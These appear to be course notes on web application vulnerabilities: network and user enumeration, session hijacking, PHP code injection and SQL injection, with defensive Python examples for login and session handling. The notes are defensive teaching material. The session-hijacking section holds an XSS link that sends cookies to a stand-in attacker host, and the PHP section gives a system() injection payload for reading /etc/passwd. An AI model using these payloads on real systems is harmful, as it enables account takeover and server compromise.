
6. Web Applications Vulnerabilities and Countermeasures - Part 2

Introduction 1 2

  • Human error is a major point of weakness; it is the cause of 90% of cyber-attacks.
  • TSP:
    • Technical Security Provider.
    • It is a company that provides security services to other companies (clients).
    • Responsibilities:
      • Provide security services to clients.
      • Provide security training, education and guidance to clients' users.
  • Any robust security training program must cover 1:
    • Phishing and social engineering.
    • Access, passwords and connection.
    • Device security.
    • Physical security.
  • Data compromise is more likely to come from an employee leaving a laptop on the train than from a malicious criminal hack 2.
  • Computers don’t create crimes. It is the people who are using the computers that commit the crimes. And people in the organizations can be—and often are—complicit. 2

User Enumeration 3 4 5 6

  • Enumeration is used to gather the following 3:
    • Usernames, group names
    • Hostnames
    • Network shares and services
    • IP tables and routing tables
    • Service settings and audit configurations
    • Applications and banners
    • SNMP and DNS details
  • Enumeration classification 3:
    • NetBIOS enumeration:
      • NetBIOS stands for Network Basic Input Output System.
      • NetBIOS is an API, developed by IBM, for clients to access LAN resources.
      • NetBIOS naming: 16 ASCII characters that identify network devices over TCP/IP; 15 chars for the device name, and 1 char for the service type.
      • NetBIOS port is TCP 139.
      • Printers and file servers are examples of NetBIOS services.
      • Attacker can:
        • Read and write to a remote machine.
        • DoS attack on the remote machine.
        • Enumerate password policies on the remote machine.
      • Prevention:
        • Disable file and printer sharing on Windows.
        • Remove unnecessary services.
    • SNMP enumeration:
      • SNMP stands for Simple Network Management Protocol.
      • SNMP is an application-layer protocol that runs on UDP; it is used to manage network devices that run on the IP layer (routers, switches, printers, etc.).
      • SNMP ports are UDP 161 and 162.
      • Attackers can:
        • Gather information about network devices such as routers, switches, printers, etc.
        • Read the ARP (Address Resolution Protocol) table, routing tables, and interface details.
        • Obtain device information.
        • Obtain traffic statistics.
      • Prevention:
        • Remove SNMP agents that are not needed.
        • Use SNMPv3, which uses encryption.
        • Use Firewalls.
        • Implement IPSec.
        • Block TCP/UDP port 161.
    • LDAP enumeration:
      • LDAP stands for Lightweight Directory Access Protocol.
      • LDAP is an application protocol for accessing and maintaining distributed directory services like Active Directory, or OpenLDAP.
      • LDAP uses TCP and Basic Encoding Rules (BER).
      • LDAP port is TCP 389.
      • Attackers can gather sensitive information such as usernames, addresses, contact details, department details and so on.
      • Prevention:
        • Use SSL.
        • Use Kerberos to restrict access to known users.
        • Enable account lockout policies to prevent brute force attacks.
    • NTP enumeration:
      • NTP stands for Network Time Protocol.
      • NTP is used to synchronize clocks of networked computers; it is based on client-server architecture, where the agent queries the NTP server for time synchronization.
      • NTP port is UDP 123.
      • Attackers can gather the list of hosts connected to the NTP server, their IP addresses, and the operating system they are running.
      • Prevention:
        • Use NTPSec.
        • Filter NTP traffic with specific IPTables.
        • Enable logging for messages and events.
    • SMTP enumeration:
      • SMTP stands for Simple Mail Transfer Protocol.
      • SMTP is used to send and receive emails; it is based on client-server architecture.
      • SMTP port is TCP 25.
      • Prevention:
        • Ignore email responses from unknown users.
        • Disable open relay functionality.
        • Prune sensitive information from email headers, like the sender’s IP address.
    • DNS enumeration:
      • DNS stands for Domain Name System.
      • DNS is used to resolve domain names to IP addresses, and vice versa.
      • DNS’s port is UDP/TCP 53.
      • Prevention:
        • Configure DNS to prevent zone transfers to unknown hosts.
        • Ensure DNS zone transfers do not contain HINFO records.
    • Windows enumeration:
      • Enumerating services, open files, processes, loggers, events, and users.
      • Attackers can execute or kill processes on the remote machine.
    • Unix/Linux enumeration:
      • Same as Windows enumeration.
  • User enumeration 4:
    • Login pages:
      • Login pages should return the same ambiguous error message for both invalid usernames and invalid passwords.
      • Returning a message that says “invalid username” or “invalid password” is a bad practice, as it allows attackers to enumerate valid usernames, that is, detect whether a username exists in the system.
      • Do not encode usernames or login error codes in the URL.
      • HTTP response codes should be the same for both invalid usernames and invalid passwords; in general the response should always be 200 OK, since a 404 Not Found or 401 Unauthorized returned in only one of the two cases can be used to enumerate usernames.
      • If detecting an incorrect username takes a different amount of time than detecting an incorrect password, an attacker may be able to tell which one is wrong even though the error message is the same; thus the server should always take the same amount of time to respond in both cases. Consider using a sleep function if necessary 5.
      • The entire HTTP response (including headers and cookies) should be the same for both invalid usernames and invalid passwords 5.
      • Implement exponential backoff to prevent brute force attacks 5.
    • Reset password pages:
      • Reset password pages should not reveal whether the username exists; they should just say that a password reset link has been sent to the email address.
      • Send an email in both cases, whether the username exists or not: if the username does not exist, send a signup email; otherwise send a reset password email 5.
    • Signup pages 5:
      • Avoid telling the user whether the username is already taken.
      • Do not use sequential IDs for users.
      • If the user tries to sign up again with an existing account, send a reset password email.
      • Use CAPTCHA to prevent automated attacks.
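The login-page rules above (one generic message and status for both failure cases, equal response time, exponential backoff) as an added example in Python; this is not code from the cited sources. The user store, the password hashing scheme (PBKDF2) and the `login` function are constructed for the illustration.

```python
import hashlib
import hmac
import os
import time
from typing import Dict, Optional, Tuple

ITERATIONS = 100_000

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

# Constructed in-memory user store (hypothetical): username -> (salt, PBKDF2 hash).
_salt = os.urandom(16)
USERS: Dict[str, Tuple[bytes, bytes]] = {"alice": (_salt, hash_password("correct horse", _salt))}

# Dummy credential so that an unknown username still costs one full PBKDF2 run,
# keeping the response time the same as for a wrong password.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("not-a-real-password", _DUMMY_SALT)

# Failed attempts per username: username -> (count, earliest time the next attempt is accepted)
_failures: Dict[str, Tuple[int, float]] = {}

GENERIC_ERROR = (200, "Invalid username or password.")  # one status, one message, both cases

def login(username: str, password: str, now: Optional[float] = None) -> Tuple[int, str]:
    """Return (HTTP status, message); identical for an unknown user and a wrong password."""
    now = time.monotonic() if now is None else now
    count, not_before = _failures.get(username, (0, 0.0))
    if now < not_before:
        return GENERIC_ERROR  # inside the backoff window: refuse without revealing anything
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)  # same cost whether or not the user exists
    # Constant-time comparison; for an unknown user this runs against the dummy hash.
    if hmac.compare_digest(candidate, stored) and username in USERS:
        _failures.pop(username, None)
        return (200, "Login successful.")
    count += 1
    delay = min(2 ** (count - 1), 300)  # exponential backoff: 1s, 2s, 4s, ... capped at 5 min
    _failures[username] = (count, now + delay)
    return GENERIC_ERROR
```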

Cookies and Session Hijacking 7 8 9

  • The term “hijacking” is just another example of a “man-in-the-middle” attack attempting to gain full access to a user’s online account.
  • Session Hijacking 8:
    • An attacker steals a valid session ID and uses it to impersonate a legitimate user.
    • The attacker sniffs or predicts the session ID.
    • Techniques:
      • Blind hijacking.
      • Man-in-the-middle.
      • Denial-of-service.
    • The first step is to understand how the connection is established and the characteristics of the session.
  • 31% of E-commerce applications are vulnerable to session hijacking 9.
  • Session hijacking = Cookie hijacking 9.
  • Common methods of session hijacking 9:
    • Session Fixation:
      • It is a vulnerability in the system that allows a user to get/set the session ID of another user.
      • It usually occurs when a website accepts session IDs from a URL parameter: the attacker sends a phishing email containing a link to the website that sets a specific session ID, so the attacker knows the victim's session ID.
      • The attacker then uses the session ID that they set to access the victim’s account.
    • Session Sniffing:
      • The attacker uses a sniffer to capture the session ID of a user, by monitoring the network traffic between the user and the server.
      • Using SSL/TLS can prevent this attack, as it encrypts the traffic between the user and the server.
      • Public Wi-Fi networks are vulnerable to this attack, as the attacker can join the network and sniff the traffic; or create a public HotSpot and monitor users’ traffic.
    • Cross-Site Scripting XSS:
      • The attacker injects malicious code into a website, and when a user visits the website, the malicious code is executed in the user’s browser which sends the session ID to the attacker.
      • An attacker may send a phishing email to a user containing a link like: http://www.yourbankswebsite.com/search?<script>location.href=’http://www.evilattacker.com/hijacker.php?cookie=’+document.cookie;</script>
      • The above link will add and execute a script that sends all cookies to the attacker.
    • Malware:
      • The attacker designs malware that is installed on the victim’s machine; it monitors traffic and sends the session ID to the attacker.
      • It is an automated session sniffing attack.
    • Brute Force:
      • The attacker tries to guess the session ID by trying different values.
      • Either by trying common session ID generation techniques (combining the user’s IP address, user agent, etc.), or by incrementing the session ID (if it is a number).
      • The attacker may keep using old session IDs, as some websites do not invalidate old session IDs or the same session ID may be generated in the future.
  • Prevention (mitigation) of session hijacking 9:
    • Use HTTPS on the entire website.
    • Use the Secure and HttpOnly flags for cookies.
    • Use long and complex session IDs.
    • Regenerate session IDs after a successful login.
    • Perform additional checks on the server side to verify the user’s identity:
      • Is the same IP address used as in previous requests?
      • But IP addresses can be spoofed, and it may also create problems for users who use VPNs.
    • Change the cookie value after a certain amount of time (or number of requests).
    • Don’t accept session IDs from URL parameters or POST requests.
    • Only accept session IDs generated by the server.
    • Timeout inactive sessions.
    • Check the Referer header, and log out if the referrer is an external website.
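The server-side parts of the mitigation list above (long random server-generated IDs, regeneration at login, Secure/HttpOnly flags, idle timeout, ignoring IDs that did not come from the cookie) as an added example in Python; it is not code from the cited guide. `SessionStore`, `parse_cookie` and `set_cookie_header` are constructed for this illustration.

```python
import secrets
from typing import Dict, Optional

IDLE_TIMEOUT = 15 * 60  # seconds of inactivity after which a session is discarded

def parse_cookie(header: str) -> Dict[str, str]:
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return {k: v for k, v in pairs}

def set_cookie_header(sid: str) -> str:
    # Secure: sent only over HTTPS (defeats sniffing); HttpOnly: unreadable via document.cookie
    # (defeats XSS theft); SameSite=Lax: not attached to cross-site POSTs.
    return f"sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"

class SessionStore:
    """In-memory server-side session store (hypothetical, constructed for this example)."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}  # session_id -> {"user": ..., "last_seen": ...}

    def create(self, user: Optional[str], now: float) -> str:
        # 256 bits from the OS CSPRNG: neither guessable nor incrementable.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": now}
        return sid

    def login(self, old_sid: str, user: str, now: float) -> str:
        # Regenerate the ID at login so a fixated or pre-login ID becomes worthless.
        self._sessions.pop(old_sid, None)
        return self.create(user, now)

    def lookup(self, cookie_header: str, now: float) -> Optional[dict]:
        # Only the cookie is consulted; URL or POST parameters are never a session source.
        sid = parse_cookie(cookie_header).get("sid")
        sess = self._sessions.get(sid) if sid else None
        if sess is None:
            return None
        if now - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]  # time out inactive sessions
            return None
        sess["last_seen"] = now
        return sess
```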

Crawling, Scraping and Prefetching 10 11 12 13

  • Scraping vs Crawling 10:
    • Web crawling:
      • A crawler, also known as a spider or a bot, is a program that browses the web in an automated manner.
      • It looks for data and more links to crawl.
    • Web scraping:
      • It is the process of extracting data from a website.
      • It is done by a web scraper, which is a program that extracts data from a website.
      • Web scraping is done by a crawler, but not all crawlers are web scrapers.
    • Usually, a crawler retrieves the HTML content and passes it to a scraper to extract the data from it.
  • Prefetching 13:
    • Prefetching is the loading of a resource before it is required to decrease the time waiting for that resource.
    • Prefetching usually relies on a cache; examples are a web browser prefetching pages or a CPU prefetching instructions.

PHP Specific Issues 14 15 16 17 18 19

  • PHP code can be injected through URL parameters: if the parameter is then rendered in the page, passing ?param=<?php phpinfo(); ?> causes it to be executed 14.
  • To execute commands through a parameter that is echoed 15:
    • ?param=;system("whoami");
    • whoami can be replaced with any command, like cat /etc/passwd.

Truncation and Trimming Attacks and SQL Injection 20 21 22 23

  • A successful SQL injection exploit can 22:
    • Read sensitive data from the database.
    • Modify database data (Insert/Update/Delete).
    • Execute administration operations on the database (such as shutdown DBMS).
    • Recover the content of a given file present on the DBMS file system.
    • Issue commands to the operating system.
  • SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces 22.
  • Types of SQL injection attacks 23:
    • In-band SQLi: uses database errors or UNION queries to extract the information.
    • Blind SQLi: the attacker cannot see the result of the query, but can infer it from other factors (such as response time).
    • Out-of-band SQLi.

References

  1. Ryerse, J. (2020, September 7). The basics of cybersecurity training for end users. ConnectWise. https://www.connectwise.com/blog/cybersecurity/the-basics-of-cybersecurity-training-for-end-users

  2. Kelly, R. (2017, March 3). Almost 90% of cyber-attacks are caused by human error or behavior. ChiefExecutive. https://chiefexecutive.net/almost-90-cyber-attacks-caused-human-error-behavior/

  3. Chakravartula, R. (2021, January 22). What is enumeration? [Updated 2021]. Infosec. https://resources.infosecinstitute.com/topic/what-is-enumeration/

  4. Lara, H. (2018, March 10). User enumeration vulnerability [Video]. YouTube. https://www.youtube.com/watch?v=IahnJVOhak4

  5. Hacksplaining. (2018, September 30). What is user enumeration? [Video]. YouTube. https://www.youtube.com/watch?v=fP0VVzPI4jQ

  6. Laverty, P. (2017, June 15). What is user enumeration? Rapid7. https://www.rapid7.com/blog/post/2017/06/15/about-user-enumeration/

  7. Computerphile. (2016, June 1). Cookie stealing – Computerphile [Video]. YouTube. https://www.youtube.com/watch?v=T1QEs3mdJoc

  8. Mr Code. (2021, January 10). What is session hijacking: a short introduction [Video]. YouTube. https://www.youtube.com/watch?v=rqDuDSPhiCs&list=PL6jT6oPokSnIhwaEwRATkmLkVl_TX9xgF

  9. Vojtko, M. (2020, November 16). The ultimate guide to session hijacking aka cookie hijacking. Hashed Out. https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/

  10. Oxylabs. (2019, October 10). Web crawling vs. web scraping | Oxylabs [Video]. YouTube. https://www.youtube.com/watch?v=cwZF87qIF7c

  11. Grobman, S. (2015, August 8). Spiderbot, spiderbot, does whatever a hacker thought. Dark Reading, Informa PLC. https://www.darkreading.com/partner-perspectives/intel/spiderbot-spiderbot-does-whatever-a-hacker-thought/a/d-id/1321850

  12. Traversy Media. (2020, January 14). Intro to web crawlers and scraping with Scrapy [Video]. YouTube. https://www.youtube.com/watch?v=ALizgnSFTwQ

  13. Prefetching. (2020, June 30). Techopedia. https://www.techopedia.com/definition/32421/prefetching

  14. BUG XS. (2020, April 12). PHP code injection | step-by-step guide | bug bounty [Video]. YouTube. https://www.youtube.com/watch?v=UlROTF-OspY

  15. HackerSploit. (2019, May 13). Bug bounty hunting - PHP code injection [Video]. YouTube. https://www.youtube.com/watch?v=GE2HyC7Gwrs

  16. The 2018 guide to building secure PHP software. (2017, December 12). Paragon Initiative Enterprises blog. https://paragonie.com/blog/2017/12/2018-guide-building-secure-php-software

  17. OWASP. (n.d.). Anatomy of a WebShell - d0n quix0te [Video]. YouTube. https://www.youtube.com/watch?v=tVKucIWH0w0

  18. OWASP PHP. (n.d.). What does PHP security mean? https://owasp.org/www-project-php/migrated_content

  19. Web application security guide/PHP-specific issues. (n.d.). Wikibooks. Retrieved June 15, 2021, from https://en.wikibooks.org/wiki/Web_Application_Security_Guide/PHP-specific_issues

  20. Edureka! (2019, October 3). What is SQL injection? | SQL injection tutorial | cybersecurity training | Edureka [Video]. YouTube. https://www.youtube.com/watch?v=3Axp3VDnf0I

  21. Henry, D. (2020, June 16). SQL injection attack explained [2020] with SQL injection examples [Video]. YouTube. https://www.youtube.com/watch?v=VZfTmu7tn34

  22. Kingthorin. (n.d.). SQL injection. OWASP. Retrieved January 10, 2022, from https://owasp.org/www-community/attacks/SQL_Injection

  23. What is SQL injection (SQLi) and how to prevent it? (n.d.). Acunetix by Invicti. https://www.acunetix.com/websitesecurity/sql-injection/